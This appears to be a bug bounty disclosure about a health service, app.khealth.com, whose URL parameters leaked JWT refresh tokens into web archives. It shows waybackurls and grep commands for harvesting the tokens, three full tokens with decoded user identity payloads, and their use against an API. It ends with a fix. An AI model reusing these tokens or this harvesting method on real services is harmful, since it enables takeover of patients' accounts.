Information disclouser from URL parameter "access" lead to Account Takeover

## Summary: "sessions" parameter contain JWT key & can be fetched by "waybackurls" tools. ## PoC - Fetch url on ring.com using waybackurls, using this command : ``` echo "app.khealth.com" | waybackurls > app.khealth.com ``` - Filter url using grep, using this command : ``` cat app.khealth.com |grep "eyJ"|h ``` - And you can farm the JWT Token, example : {F2748658} ##Validate JWT Token - Token 1 : ``` eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZGVudGl0eSI6IjY1MGFkNDE5MGY4ZDkxODU3YzgxZTRiZSIsInRlbmFudCI6ImtoZWFsdGgiLCJleHAiOjE3Mjc4OTU1MDEsImZyZXNoIjpmYWxzZSwiaWF0IjoxNjk2MzU5NTAxLCJqdGkiOiI0MzJlNDVhZC1hNzUxLTQzOTUtOGU4YS04OTNmNjViODQ4N2EiLCJuYmYiOjE2OTYzNTk1MDEsInR5cGUiOiJyZWZyZXNoIn0.E85o25rJ5t1k9HzuZa4dCJq6l_WKvWaKCVbH2jAHvvaZXPKmV1C04dsbPRFEgsCxuV6XV8hP99G8f20fR3SMDNDrqwHojWDGt75BYf9F33x_J_GKbZMtWkmat7_qqdu8lSvPhHRNl8GBwKqegus0yTtS1PLH0GHDsvaBRmgFdCNiAol9H45Yok9YnVoKgEPZr2_Gz96NsjYqm-Iv5OaV4oBjtmgQTQJ569vHwDA04Dj64mAIOP_wdASYiOrCgMtltsEwwJYSym2YyAC7t7ITenuSm1p8OH6cU10XTRGnfACo-LjinAnM-UpHkrZEJ53wFrQTS8J9Aqjhk_YTzv-nuQ ``` After decode : ``` { "identity": "650ad4190f8d91857c81e4be", "tenant": "khealth", "exp": 1727895501, "fresh": false, "iat": 1696359501, "jti": "432e45ad-a751-4395-8e8a-893f65b8487a", "nbf": 1696359501, "type": "refresh" } ``` Using JWT Token to request GET to api-2.khealth.io/api/v2/home {F2748674} - Token 2 : ``` eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZGVudGl0eSI6IjY1MGJlYmRiYjdlODVkMzExMmUyMzg1MCIsInRlbmFudCI6ImtoZWFsdGgiLCJleHAiOjE3Mjc4OTUzNDIsImZyZXNoIjpmYWxzZSwiaWF0IjoxNjk2MzU5MzQyLCJqdGkiOiJmMzM1NTcyYS0yMmIyLTRkMTYtYWZjMy1iNTQ2YzY0NGFlOGEiLCJuYmYiOjE2OTYzNTkzNDIsInR5cGUiOiJyZWZyZXNoIn0.LJwe3su6W5IFyFJFyHIgOGCnBc6SxhzlWOwhsIMYgagMl79ahJTsgQ95cS6sqHmbzt76mtyi8KYqVbzEwQLUle0asWjtsIMa9GLngYKYqylP7k5UIqae4nLAp_m2I75SVCr3iyinY7QJVOTxwNKfm59bq1-0lVy-G1mKVZ5KThL_4OzV_PN9Jf5kYSXEoH1r4zY92gI2EVk-_Tcbj47l1OlYnN4d-58UQP1TjdDptTA2FPeFD4AdX8-PIwv7imeVgAKE4cNn1sVew6Rl0GiPqnK_EwoJUL1BuYXXnn-zDR7sbIqTuB4quIkjpCq8S4cRJYudoTYcmN_rRKorpeYAKA ``` After decode : ``` { "identity": "650bebdbb7e85d3112e23850", "tenant": "khealth", "exp": 1727895342, "fresh": false, "iat": 1696359342, "jti": "f335572a-22b2-4d16-afc3-b546c644ae8a", "nbf": 1696359342, "type": "refresh" } ``` Using JWT Token to request GET to api-2.khealth.io/api/v2/home {F2748699} - Token 3 ``` eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZGVudGl0eSI6IjY1MWM2NTkwZmJiY2Q2ZDdkNDY2NjQwMyIsInRlbmFudCI6ImtoZWFsdGgiLCJleHAiOjE3Mjc4OTU4MjYsImZyZXNoIjpmYWxzZSwiaWF0IjoxNjk2MzU5ODI2LCJqdGkiOiI3OWRjYWNkYS00OGJhLTQxZDctYmMxYi1mYjk1NjM1MDBiM2MiLCJuYmYiOjE2OTYzNTk4MjYsInR5cGUiOiJyZWZyZXNoIn0.P6cyASY1H6KFg6LS35Pdx4Z-t9Mjp-BR6e_h5jvj4m3nDpta4hrw3rjmCaPyTN-_keSoZxTexu5QaOYS64xhCeBt1Wr8o3HSwQicVjCIX3izwcofhgP3DrebdqIAxN0GUNsrOD72XWFCoL0VWRA4V8z6D46MWVFpqkOua0DGabQm5bMpJ_Fw-tGeRdwUnl0M8nOTU_PlQOWy2D_R2clK6OTj2gBLyxhzeHIr7xCkB16D07L0qzNQQIti_o49uQRAE2PiMkVJVX41y8LQ8SmyNToFOEwZsToa7VJaL5_hqLKTZEF3OTAY0Q2j5kNxZWHwLC2uwXrPF7bKXS3fGLruJQ ``` After decode : ``` { "identity": "651c6590fbbcd6d7d4666403", "tenant": "khealth", "exp": 1727895826, "fresh": false, "iat": 1696359826, "jti": "79dcacda-48ba-41d7-bc1b-fb9563500b3c", "nbf": 1696359826, "type": "refresh" } ``` Using JWT Token to request GET to api-2.khealth.io/api/v2/home {F2748716} ##Recommendation Remove JWT Tokens from Request Parameters: Modify the application code to ensure that JWT tokens are not included in request parameters. Instead, they should be transmitted in a more secure manner, such as in HTTP headers or in the body of POST requests. ## Impact Account Takeover